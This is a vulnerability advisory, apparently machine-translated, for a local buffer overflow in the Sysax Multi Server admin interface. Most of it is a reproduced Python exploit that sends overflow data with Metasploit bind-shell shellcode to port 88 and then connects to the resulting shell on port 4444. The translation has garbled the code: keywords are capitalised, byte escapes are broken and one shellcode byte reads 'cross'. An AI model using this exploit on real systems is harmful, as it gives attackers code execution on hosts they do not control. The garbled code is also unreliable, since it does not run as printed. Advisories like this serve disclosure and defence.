Release date:
Updated on:
Affected Systems:
Codeorigin Sysax Multi Server 5.60
Codeorigin Sysax Multi Server 5.57
Codeorigin Sysax Multi Server 5.55
Codeorigin Sysax Multi Server 5.53
Codeorigin Sysax Multi Server 5.52
Codeorigin Sysax Multi Server 5.50
Codeorigin Sysax Multi Server 5.25
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54094
Sysax Multi Server is an SSH2 and FTP Server on Windows.
A buffer overflow vulnerability exists in Sysax Multi Server versions earlier than 5.62. Attackers can exploit this vulnerability to execute arbitrary code.
<* Source: Craig Freyman
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Craig Freyman () provides the following test methods:
#! /Usr/bin/python
######################################## ######################################## ##########################
# Title: Sysax <= 5.62 Admin Interface Local Buffer Overflow
# Author: Craig Freyman (@ cd1zz)
# Tested on: XP SP3 32bit
# Date Discovered: June 15,201 2
# Vendor Contacted: June 19,201 2
# Details: http://www.pwnag3.com/2012/06/sysax-admin-interface-local-priv.html
######################################## ######################################## ##########################
Import socket, sys, time, re, base64, subprocess
Def main ():
Global login
Print "\ n"
Print "************************************** **************************************"
Print "Sysax <= 5.62 Admin Interface Local Buffer Overflow"
Print "by @ cd1zz www.pwnag3.com"
Print "************************************** **************************************"
# Initial GET
Login = "GET/scgi? HTTP/1.1 \ r \ n"
Login + = "Host: localhost: 88 \ r \ n"
Login + = "Referer: http: // localhost: 88 \ r \ n"
Try:
R = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
R. connect (target, port ))
Print "[+] Accessing admin interface"
R. send (login)
Except t Exception, e:
Print "[-] There was a problem"
Print e
# Loop the recv sock so we get the full page
Page =''
Fullpage =''
While "Page = r. recv (4096)
Fullpage + = page
Time. sleep (1)
# Regex the sid from the page
Global sid
Sid = re. search (r'sid = [a-zA-Z0-9] {40} ', fullpage, re. M)
If sid is None:
Print "[-] There was a problem finding your SID"
Sys. exit (1)
Time. sleep (1)
R. close ()
Def exploit ():
# Msfpayload windows/shell_bind_tcp LPORT = 4444 R | msfencode-e x86/shikata_ga_nai-B "\ x00 \ x0a \ x0d"
Shell = (
"\ Xdb \ xd5 \ xd9 \ x74 \ x24 \ xf4 \ xb8 \ xc3 \ x8f \ xb3 \ x3e \ x5b \ x33 \ xc9"
"\ Xb1 \ x56 \ x31 \ x43 \ x18 \ x03 \ x43 \ x18 \ x83 \ xeb \ x3f \ x6d \ x46 \ xc2"
"\ X57 \ xfb \ xa9 \ x3b \ xa7 \ x9c \ x20 \ xde \ x96 \ x8e \ x57 \ xaa \ x8a \ x1e"
"\ X13 \ xfe \ x26 \ xd4 \ x71 \ xeb \ xbd \ x98 \ x5d \ x1c \ x76 \ x16 \ xb8 \ x13"
"\ X87 \ x96 \ x04 \ xff \ x4b \ xb8 \ xf8 \ x02 \ x9f \ x1a \ xc0 \ xcc \ xd2 \ x5b"
"\ X05 \ x30 \ x1c \ x09 \ xde \ x3e \ x8e \ xbe \ x6b \ x02 \ x12 \ xbe \ xbb \ x08"
"\ X2a \ xb8 \ xbe \ xcf \ xde \ x72 \ xc0 \ x1f \ x4e \ x08 \ x8a \ x87 \ xe5 \ x56"
"\ X2b \ xb9 \ x2a \ x85 \ x17 \ xf0 \ x47 \ x7e \ xe3 \ x03 \ x81 \ x4e \ x0c \ x32"
"\ Xed \ x1d \ x33 \ xfa \ xe0 \ x5c \ x73 \ x3d \ x1a \ x2b \ x8f \ x3d \ xa7 \ x2c"
"\ X54 \ x3f \ x73 \ xb8 \ x49 \ xe7 \ xf0 \ x1a \ xaa \ x19 \ xd5 \ xfd \ x39 \ x15"
"\ X92 \ x8a \ x66 \ x3a \ x25 \ x5e \ x1d \ x46 \ xae \ x61 \ xf2 \ xce \ xf4 \ x45"
"\ Xd6 \ x8b \ xaf \ xe4 \ x4f \ x76 \ x1e \ x18 \ x8f \ xde \ xff \ xbc \ xdb \ xcd"
"\ X14 \ xc6 \ x81 \ x99 \ xd9 \ xf5 \ x39 \ x5a \ x75 \ x8d \ x4a \ x68 \ xda \ x25"
"\ Xc5 \ xc0 \ x93 \ xe3 \ x12 \ x26 \ x8e \ x54 \ x8c \ xd9 \ x30 \ xa5 \ x84 \ x1d"
"\ X64 \ xf5 \ xbe \ xb4 \ x04 \ x9e \ x3e \ x38 \ xd1 \ x31 \ x6f \ x96 \ x89 \ xf1"
"\ Xdf \ x56 \ x79 \ x9a \ x35 \ x59 \ xa6 \ xba \ x35 \ xb3 \ xd1 \ xfc \ xfb \ xe7"
"\ Xb2 \ x6a \ xfe \ x17 \ x25 \ x37 \ x77 \ xf1 \ x2f \ xd7 \ xd1 \ xa9 \ xc7 \ x15"
"\ X06 \ x62 \ x65 \ x6c \ xde \ x29 \ xf1 \ x38 \ x08 \ xed \ xfe \ xb8 \ x1e"
"\ X5e \ x52 \ x10 \ xc9 \ x14 \ xb8 \ xa5 \ xe8 \ x2b \ x95 \ x8d \ x63 \ x14 \ x7e"
"\ X47 \ x1a \ xd7 \ x1e \ x58 \ x37 \ x8f \ x83 \ xcb \ xdc \ x4f \ xcd \ xf7 \ x4a"
"\ X18 \ x9a \ xc6 \ x82 \ xcc \ x36 \ cross \ x3d \ xf2 \ xca \ xe4 \ x06 \ xb6 \ x10"
"\ Xd5 \ x89 \ x37 \ xd4 \ x61 \ xae \ x27 \ x20 \ x69 \ xea \ x13 \ xfc \ x3c \ xa4"
"\ Xcd \ xba \ x96 \ x06 \ xa7 \ x14 \ x44 \ xc1 \ x2f \ xe0 \ xa6 \ xd2 \ x29 \ xed"
"\ Xe2 \ xa4 \ xd5 \ x5c \ x5b \ xf1 \ xea \ x51 \ x0b \ xf5 \ x93 \ x8f \ xab \ xfa"
"\ X4e \ x14 \ xdb \ xb0 \ xd2 \ x3d \ x74 \ x1d \ x87 \ x7f \ x19 \ x9e \ x72 \ x43"
"\ X24 \ x1d \ x76 \ x3c \ xd3 \ x3d \ xf3 \ x39 \ x9f \ xf9 \ xe8 \ x33 \ xb0 \ x6f"
"\ X0e \ xe7 \ xb1 \ xa5 ")
Nops = "\ x90" * 20
#7CA7A787 FFE4 jmp esp shell32.dll v6.00.2900.6072
Jmp_esp = "\ x87 \ xA7 \ xA7 \ x7C"
Payload = base64.b64encode ("A" * 392 + jmp_esp + nops + shell + nops ))
# Setup exploit
Exploit = "POST/scgi? "+ Str (sid. group (0) +" &pid=scriptpathbrowse2.htm HTTP/1.1 \ r \ n"
Exploit + = "Host: localhost: 88 \ r \ n"
Exploit + = "Content-Type: application/x-www-form-urlencoded \ r \ n"
Exploit + = "Content-Length:" + str (len (payload) + 3) + "\ r \ n"
Exploit + = "e2 =" + payload + "\ r \ n"
Try:
R = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
R. connect (target, port ))
Print "[+] Sending pwnag3"
R. send (exploit)
Except t Exception, e:
Print "[-] There was a problem"
Print e
Time. sleep (2)
Print "[+] Here is your shell ..."
Subprocess. Popen ("telnet localhost 4444", shell = True). wait ()
Sys. exit (1)
If _ name _ = '_ main __':
If len (sys. argv )! = 1:
Print "[-] Usage: % s"
Sys. exit (1)
# By default it binds to 127.0.0.1 on 88
Target = "127.0.0.1"
Port = 88
Main ()
Exploit ()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Codeorigin
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.ftpshell.com/index.htm